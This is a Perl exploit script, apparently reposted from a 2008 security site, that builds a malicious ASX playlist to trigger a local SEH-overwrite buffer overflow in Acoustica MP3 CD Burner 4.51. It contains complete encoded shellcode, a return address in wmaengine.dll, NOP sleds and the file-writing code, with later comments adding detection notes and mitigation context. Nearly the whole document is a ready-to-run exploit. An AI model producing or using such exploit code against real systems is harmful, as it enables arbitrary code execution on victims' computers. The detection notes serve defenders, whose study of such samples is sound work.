| Acoustica MP3 CD Burner 4.51 Build 147 (asx file) Local BOF Exploit |   
| 来源:www.vfcocus.net 作者:Koshi 发布时间:2008-09-01 |   
#!/usr/bin/perl
 #
 # Acoustica MP3 CD Burner (asx file) Local BOF Exploit
 # Author: Koshi
 #
 # Date: 08-29-08 ( 0day )
 # Application: Acoustica MP3 CD Burner
 # Version: 4.51 Build 147 ( possibly older )
 # Site: http://acoustica.com/download.htm
 # Tested On: Windows XP SP3 Fully Patched
 #
 # Based off of n00b's findings http://www.milw0rm.com/exploits/4017
 # gr33tz: Rima my baby, str0ke, n00b ( nice find )
 
 
 # Payload bytes, reproduced verbatim from the original post.
 # According to the generator banner on the next line, this is Metasploit's
 # win32_exec payload configured to start calc.exe (a visible marker that
 # code execution happened), 338 bytes long, encoded with Alpha2.
 # The literal matches that description in two checkable ways: it is
 # 21 * 16 + 2 = 338 bytes, and after the first ten bytes every byte is
 # printable ASCII, as an alphanumeric encoder would produce.
 # NOTE(review): the decoded behaviour was not re-verified here; treat the
 # banner as the author's claim.
 # Detection note: the script writes these bytes unmodified into the output
 # file, so the fixed ten-byte prefix followed by a long alphanumeric run is
 # a usable content match for this specific sample.
 # win32_exec -  EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
 my $shellcode =
 "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
 "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66".
 "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x76\x42\x32\x42\x41\x32".
 "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x49\x79\x4b\x4c\x4d".
 "\x38\x43\x74\x67\x70\x63\x30\x67\x70\x4c\x4b\x41\x55\x37\x4c\x6c".
 "\x4b\x41\x6c\x73\x35\x53\x48\x64\x41\x4a\x4f\x6c\x4b\x70\x4f\x67".
 "\x68\x6c\x4b\x41\x4f\x57\x50\x45\x51\x5a\x4b\x53\x79\x4e\x6b\x74".
 "\x74\x6c\x4b\x76\x61\x38\x6e\x64\x71\x59\x50\x6e\x79\x4e\x4c\x6b".
 "\x34\x79\x50\x63\x44\x73\x37\x4a\x61\x69\x5a\x44\x4d\x76\x61\x6b".
 "\x72\x7a\x4b\x4b\x44\x35\x6b\x50\x54\x77\x54\x65\x54\x71\x65\x4d".
 "\x35\x6e\x6b\x61\x4f\x64\x64\x65\x51\x7a\x4b\x63\x56\x4c\x4b\x56".
 "\x6c\x50\x4b\x4e\x6b\x43\x6f\x47\x6c\x65\x51\x6a\x4b\x6c\x4b\x55".
 "\x4c\x6c\x4b\x64\x41\x68\x6b\x6d\x59\x63\x6c\x45\x74\x75\x54\x59".
 "\x53\x36\x51\x4b\x70\x71\x74\x6e\x6b\x67\x30\x30\x30\x6f\x75\x6b".
 "\x70\x30\x78\x64\x4c\x4c\x4b\x37\x30\x44\x4c\x6e\x6b\x54\x30\x47".
 "\x6c\x6e\x4d\x6e\x6b\x53\x58\x75\x58\x6a\x4b\x76\x69\x4e\x6b\x6b".
 "\x30\x6c\x70\x37\x70\x47\x70\x35\x50\x4c\x4b\x50\x68\x57\x4c\x51".
 "\x4f\x35\x61\x6c\x36\x63\x50\x52\x76\x4f\x79\x6c\x38\x6b\x33\x6f".
 "\x30\x31\x6b\x36\x30\x33\x58\x73\x4e\x69\x48\x6b\x52\x44\x33\x55".
 "\x38\x6d\x48\x4b\x4e\x4d\x5a\x74\x4e\x50\x57\x4b\x4f\x48\x67\x71".
 "\x73\x62\x41\x32\x4c\x45\x33\x56\x4e\x55\x35\x61\x68\x31\x75\x75".
 "\x50\x66";
 
 # Assemble the oversized string that later becomes the REF HREF value of the
 # ASX playlist. Layout, in order: 480 filler bytes, the two 4-byte fields the
 # author labels as the SEH record, 35 bytes of 0x90, the payload, and 150
 # more bytes of 0x90.
 # Detection note: the resulting HREF value is about 1 KB
 # (480 + 4 + 4 + 35 + payload + 150 bytes) and contains long 0x90 runs and
 # other non-printable bytes, none of which belongs in a playlist URL.
 # Mitigation context: exception-handler overwrites of this kind are what
 # SafeSEH and SEHOP were introduced to stop; whether wmaengine.dll was built
 # with SafeSEH is not shown on this page.
 my $bof  = 'A' x 480;
 my $led  = "\x90" x 35;
 my $fill = "\x90" x 150;
 my $buff = join '',
     $bof,
     "\xeb\x06\x90\x90",    # author's label: pointer to next SEH record
     "\x65\x82\x19\x01",    # author's label: SE handler, wmaengine.dll POP POP RET 0x01198265
     $led,
     $shellcode,
     $fill;
 
 # Build the ASX (Windows Media playlist) document that carries the string.
 # The markup is a normal ASX 3.0 playlist with a single ENTRY; the only
 # abnormal part is the REF HREF attribute, whose value is $buff followed by
 # ".asf". Each element is terminated with a newline.
 # Detection note: a parser or mail/web filter can flag ASX files whose HREF
 # attribute is far longer than a plausible URL or holds non-printable bytes.
 my @asx_lines = (
     '<ASX VERSION="3.0">',
     '<ENTRY>',
     '<TITLE>Acoustica MP3 CD Burner Local BOF Exploit</TITLE>',
     '<REF HREF="' . $buff . '.asf"/>',
     '</ENTRY>',
     '</ASX>',
 );
 my $tuff = join '', map { "$_\n" } @asx_lines;
 
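 # Write the generated playlist to Exploit.asx in the current directory.
 # Changes from the original: three-argument open with a lexical handle
 # instead of a bareword handle and a mode embedded in the filename, and
 # every I/O call is checked, so the success message is no longer printed
 # when the file could not be opened or written.
 # NOTE(review): append mode is kept from the original, so running the script
 # again adds a second document to the same file instead of replacing it.
 my $out_path = 'Exploit.asx';
 open(my $out_fh, '>>', $out_path)
     or die "Cannot open $out_path for append: $!\n";
 # binmode keeps the raw bytes intact (no newline translation on Windows).
 binmode($out_fh);
 print {$out_fh} $tuff
     or die "Cannot write to $out_path: $!\n";
 # Buffered write errors surface at close, so check it too.
 close($out_fh)
     or die "Cannot close $out_path: $!\n";
 print "Exploit file has been created. ( Exploit.asx )\n";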
 
 